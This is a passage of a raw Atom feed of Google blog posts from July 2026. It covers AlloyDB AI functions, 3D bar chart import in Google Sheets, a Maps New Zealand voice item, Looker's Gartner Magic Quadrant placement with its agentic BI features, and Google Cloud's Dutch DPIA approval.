        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=PxbLWePxt40"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Getting started is easy&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to bring unprecedented speed and cost-efficiency to your AI workloads?&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;New to AlloyDB?&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Discover AlloyDB with a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/free-trial-cluster"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;30-day free trial&lt;/span&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;.&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;AI functions quickstart:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Enable a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/evaluate-semantic-queries-ai-operators"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;few quick prerequisites&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and start calling functions like &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.if&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.generate&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, or &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.analyze_sentiment&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; directly within your SQL queries. Check out these &lt;/span&gt;&lt;a href="https://medium.com/google-cloud/sql-in-the-gemini-era-bringing-gemini-3-0-to-your-data-with-alloydb-ai-3c5ab775ab31" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;practical examples&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to begin.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Boost performance and optimize costs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; To unlock the biggest performance and cost gains, follow our guide on &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/accelerate-queries-optimized-functions"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;optimized functions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This is available in preview for &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.if&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;, and will be expanding to more functions soon. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;For technical insights on this technique, including when it works best and when not, refer to this &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/more-than-100x-faster-and-cheaper-llm-powered-sql-queries-with-proxy-models?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog post&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Scale your throughput:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Use &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/accelerate-ai-queries"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;smart batching&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to accelerate AI functions (available in preview for &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.if&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ai.rank&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;) or &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/evaluate-semantic-queries-ai-operators#filter-batch-arrays"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;array-based functions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (generally available for all LLM-based AI functions) to handle bulk prompting smoothly.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/databases/boost-performance-and-lower-costs-with-alloydb-ai-functions" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-01T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/import-3d-bar-charts-into-google-sheets.html</id>
    <title>Import 3D bar charts into Google Sheets</title>
    <updated>2026-07-01T17:37:58+00:00</updated>
    <content type="html">&lt;p&gt;Google Sheets now fully supports the import of 3D bar charts. Previously, when users imported files containing 3D bar charts into Sheets, they would be displayed as 2D bar charts. With this update, importing these types of files, including from Microsoft Excel, will yield a more seamless experience.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqRNyoM6VVKVmutPtyGFLvuW_86GeNOapKNwgHWUXzvhQcBASRnIKTKA6kMgsjkhmE_r1R3wjo-6lBj6csNS-PH2HrmqZGvQ80njz0toQqCiZhJ0idLw8IsK-HQYbUhjLsoEiEosEM5W7YKbIIGPpyeULG0iVUVFx6KGnxUltpxmzttXgoJcrHzhACZso/s2048/Import%203D%20bar%20charts%20into%20Google%20Sheets%20-%206843.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqRNyoM6VVKVmutPtyGFLvuW_86GeNOapKNwgHWUXzvhQcBASRnIKTKA6kMgsjkhmE_r1R3wjo-6lBj6csNS-PH2HrmqZGvQ80njz0toQqCiZhJ0idLw8IsK-HQYbUhjLsoEiEosEM5W7YKbIIGPpyeULG0iVUVFx6KGnxUltpxmzttXgoJcrHzhACZso/s1600/Import%203D%20bar%20charts%20into%20Google%20Sheets%20-%206843.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;3D bar chart imported into Google Sheets&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/63824" target="_blank"&gt;learn more about adding and editing a chart in Google Sheets&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains:&lt;/a&gt; Available now&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on July 13, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers and users with personal Google accounts&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/63824" target="_blank"&gt;Add &amp;amp; edit a chart or graph&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/import-3d-bar-charts-into-google-sheets.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-01T17:37:58+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/maps/te-reo-maori</id>
    <title>Maps has an authentic new voice in New Zealand</title>
    <updated>2026-07-01T17:00:00+00:00</updated>
    <content type="html">The image shows the new Maps New Zealand feature</content>
    <link href="https://blog.google/products-and-platforms/products/maps/te-reo-maori" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-01T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/business-intelligence/looker-in-2026-gartner-analytics-and-bi-platforms-mq</id>
    <title>Google named a Leader in 2026 Gartner® Magic Quadrant™ for Analytics and Business Intelligence Platforms for third year in a row</title>
    <updated>2026-07-01T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For the third consecutive year, Google has been recognized as a Leader in the 2026 Gartner® Magic Quadrant™ for Analytics and Business Intelligence Platforms. This recognition comes on the heels of Google Cloud Next 2026, where we feel we showcased a fundamental evolution in how enterprises interact with data: the shift from a reactive system of intelligence to a proactive &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;system of action&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. As organizations rapidly evolve to incorporate autonomous AI into daily operations, Looker and Google are redefining the modern stack by bridging the gap between data insights and automated business workflows. By anchoring this agentic transition in a foundation of enterprise-grade trust, Looker’s Agentic solution continues to serve global organizations, from fast-growing startups to large enterprises, by transforming raw data into trusted, actionable business value.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our momentum in this agentic era relies on two core pillars: a universal semantic layer that establishes a foundation of truth, and Gemini’s deep reasoning capabilities that turn that truth into autonomous business action.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="bimq" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/bimq.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Download the complimentary &lt;a href="https://cloud.google.com/resources/content/gartner-abi-magic-quadrant"&gt;2026 Gartner Magic Quadrant for Analytics and Business Intelligence Platforms&lt;/a&gt;.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The universal semantic layer agents&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At the core of the agentic transition is Looker’s semantic layer. In a world where hallucinated data and conflicting metrics can kill business, LookML is critical for customers such as &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=u72ZSc8jLg4&amp;amp;t=16m35s" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;YouTube&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/telenor-looker?e=0"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Telenor&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/allo-fiber"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Allo Fiber&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, deploying agents into production at scale and keeping them grounded in verified enterprise truth.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Key governance strengths include:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Unified analytics governance:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Centralized, code-based semantic layer that guarantees metric consistency across the organization. Pairing this single source of truth with hierarchical permissions and a new certification framework controls content trust levels and enables proactive platform auditing.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Governed semantic layer for in-database analytic and graph modeling:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Native integration with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/analytic-models"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;in-database analytic models&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, including BigQuery Graph and Snowflake semantic views, enables organizations to define, version-control, and manage complex relational and graph-based data relationships natively within LookML while maintaining a consistent semantic truth across external applications.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Enterprise lifecycle management:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Native, git-based version control supports continuous integration testing and seamless multi-environment management before production deployment.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;High concurrency architecture:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Elastic resource allocation mitigates usage spikes, allowing teams to deliver scalable insights during heavy user demand.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Powered by Gemini’s reasoning capabilities&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;True agentic business intelligence requires deep cognitive reasoning. Looker’s purpose-built BI generative AI capabilities with Gemini 3 serve as Looker’s native AI fabric, unlocking two significant advantages across the enterprise:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;For business users:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; It enables complex, multi-layered strategic analysis through advanced, natural-language abstract reasoning.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;For developers:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; It embeds directly into the daily workflow to dramatically accelerate analytics engineering with reliable LookML auditing and automated code writing.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Leaping into the Agentic BI era with Looker and Gemini&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini is powering the reimagination of the Looker stack from agentic semantic modeling, data explorations, Dashboard Agents, to Conversational Analytics. At Google Cloud Next 2026, we &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/business-intelligence/looker-updates-for-agentic-bi-at-next26"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;showcased&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; our latest Looker product innovations:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Looker everywhere&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: We are expanding Looker's footprint beyond traditional interfaces through headless BI architectures, highlighted by &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/business-intelligence/introducing-looker-mcp-server"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Looker’s Managed MCP offering&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This capability brings our semantic intelligence directly to external platforms, &lt;/span&gt;&lt;a href="https://cloud.google.com/customers/paypal-looker-mcp"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;as showcased by PayPal&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which successfully scaled accurate conversational analytics to 3,000+ users via Claude Desktop and Looker MCP. Developers can also leverage the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini/data-agents/conversational-analytics-api/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Conversational Analytics API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to build, secure, and deploy custom, trusted data agents within any proprietary application or third-party agent platform.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Looker BI Agents: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Our specialized &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/conversational-analytics-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;conversational agents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; allow users to query complex data models across applications using plain natural language, while &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/conversational-analytics-looker-data-agents-dashboards"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;dashboard agents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; embed these interactive conversational experiences directly into existing dashboards. Fully integrated with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/conversational-analytics-looker-data-agents#publish-data-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, these agents can be deployed straight into your corporate workspace workflows. Furthermore, across all environments, these agents enable users to orchestrate autonomous agentic workflows and monitor execution, helping ensure teams can interact with LookML-governed metrics and trigger automated actions right where they already cooperate.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;AI-powered self service:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We’ve  completely reimagined Explore Mode, combining an intuitive drag-and-drop canvas with conversational analytics. Tools like the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/custom-looker-visualization-gemini"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Visualization Assistant&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; use natural language to design beautiful charts on the fly, while the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/gemini-insight-asst"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Insight Assistant&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; auto-generates narratives to surface key trends in seconds. This sits alongside now generally available (GA) paginated reporting and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/tabbed-dashboards"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;tabbed dashboards&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Vibe-coding with the LookM&lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;L Agent:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This specialized AI agent and new VS Code extension enable full-lifecycle LookML development, management, and deployment entirely outside of Looker in any VS Code-based IDE. The agent accelerates semantic modeling by translating natural language into LookML, generating models directly from existing BigQuery/AlloyDB datasets, and integrating easily with existing agentic skills. Allowing developers to develop and interact with Looker within a single interface delivers a highly cohesive and accelerated environment.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Universal semantic layer&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: With the new &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=ifMWVn8R9Sw" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;in-database analytics model support&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, LookML can support graph models and complex semantic ontologies with BigQuery Graph and Snowflake Semantic Views. LookML can flex to a broad set of governed use cases for data agents for industries like retail, supply chain, cybersecurity, with graph relationships alongside table-based models for scale-out BI agents.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By combining Looker's analytical governance with Google's Agentic Data Cloud, we help ensure your autonomous AI agents operate on verified enterprise metrics, not hallucinated guesswork. Whether you are deeply embedded in the Google Cloud ecosystem or leveraging Looker across a multi-cloud data architecture, Looker provides the openness, scale, and semantic grounding required to power the future of business.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Download the report:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Read the full&lt;/span&gt; &lt;a href="https://cloud.google.com/resources/content/gartner-abi-magic-quadrant"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;2026 Gartner Magic Quadrant for ABI Platforms&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to explore the detailed vendor evaluations.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Explore agentic Looker:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Read our full recap of&lt;/span&gt; &lt;a href="https://cloud.google.com/blog/products/business-intelligence/looker-updates-for-agentic-bi-at-next26"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Looker Updates for Agentic BI at Next '26&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;sub&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;Gartner Magic Quadrant for Analytics and Business Intelligence Platforms - Anirudh Ganeshan, Edgar Macari, Christopher Long, June 29, 2026&lt;/span&gt;&lt;/em&gt;&lt;/sub&gt;&lt;/p&gt;
&lt;p&gt;&lt;sub&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;GARTNER is a registered trademark and service mark of Gartner and Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.&lt;/span&gt;&lt;/em&gt;&lt;/sub&gt;&lt;/p&gt;
&lt;p&gt;&lt;sub&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google.&lt;/span&gt;&lt;/em&gt;&lt;/sub&gt;&lt;/p&gt;
&lt;p&gt;&lt;sub&gt;&lt;em&gt;&lt;span style="vertical-align: baseline;"&gt;Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.&lt;/span&gt;&lt;/em&gt;&lt;/sub&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/business-intelligence/looker-in-2026-gartner-analytics-and-bi-platforms-mq" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-01T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/google-cloud-confirmed-to-offer-a-safer-choice-for-eu-public-sector-organizations-with-dutch-dpia-approval</id>
    <title>Google Cloud confirmed to offer a safer choice for EU public sector organizations with Dutch DPIA approval</title>
    <updated>2026-07-01T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud, we are committed to providing public sector organizations around the globe with cloud technology that is highly flexible, scalable, and built with market-leading standards for data protection, sovereignty, and security. We understand that for public sector organizations in the European Union, confidence in data protection is not just a preference — it’s a prerequisite. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today, we’re excited to announce a major milestone that reinforces this commitment for Google Cloud.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Dutch government DPIA confirms strong privacy foundation for Google Cloud&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We have successfully collaborated with &lt;/span&gt;&lt;a href="https://www.digitaleoverheid.nl/overzicht-van-alle-onderwerpen/slm-rijk/slm-mga/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;SLM Rijk&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, the Dutch government's strategic vendor management agency, who completed their rigorous data protection impact assessment (DPIA) of Google Cloud. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This engagement confirms Google Cloud’s strong commitment to strengthening trust in its privacy posture across the Dutch public sector. Given that all the key points raised during the DPIA have been successfully addressed (see SLM Rijk’s summary &lt;/span&gt;&lt;a href="https://open.overheid.nl/details/3ef89ab7-ccaf-4753-8335-9f226eaa9c24" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;), and that their DPIA concluded that there are no known high data protection risks when the recommended measures are implemented, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;the Dutch central public sector is now officially enabled to use Google Cloud with a clear path from a privacy-assessment perspective&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Accordingly, we encourage Dutch central public sector prospects and customers to engage with us to learn more about Google Cloud. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;More broadly, we believe this outcome provides a strong foundation for public sector organisations across the Netherlands and beyond, to confidently evaluate and adopt Google Cloud, unlocking modernization and digital transformation securely.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This achievement builds upon our strong track record in the region, including the successful completion of the &lt;/span&gt;&lt;a href="https://workspace.google.com/blog/identity-and-security/eu-public-sector-dutch-approval-and-new-capabilities?e=48754805" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Dutch DPIA on Google Workspace&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This previous success affirmed the safe use of Workspace across the Dutch public sector and educational institutions. Together, these assessments demonstrate Google's continued commitment to helping public sector organisations meet their privacy, security, and compliance requirements while benefiting from the innovation and scalability of Google Cloud.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Continued support for all customers on their compliance journeys&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We welcome independent assessments that help strengthen trust, transparency, and accountability. The Dutch government's DPIA process represents an important example of constructive collaboration between public institutions, independent experts, and cloud providers to advance privacy protections.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud remains committed to helping customers meet their compliance obligations while providing secure, transparent, and privacy-conscious cloud services.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We will continue investing in privacy-enhancing technologies, transparency initiatives, and customer controls to support organisations across Europe and around the world.&lt;/span&gt;&lt;/p&gt;
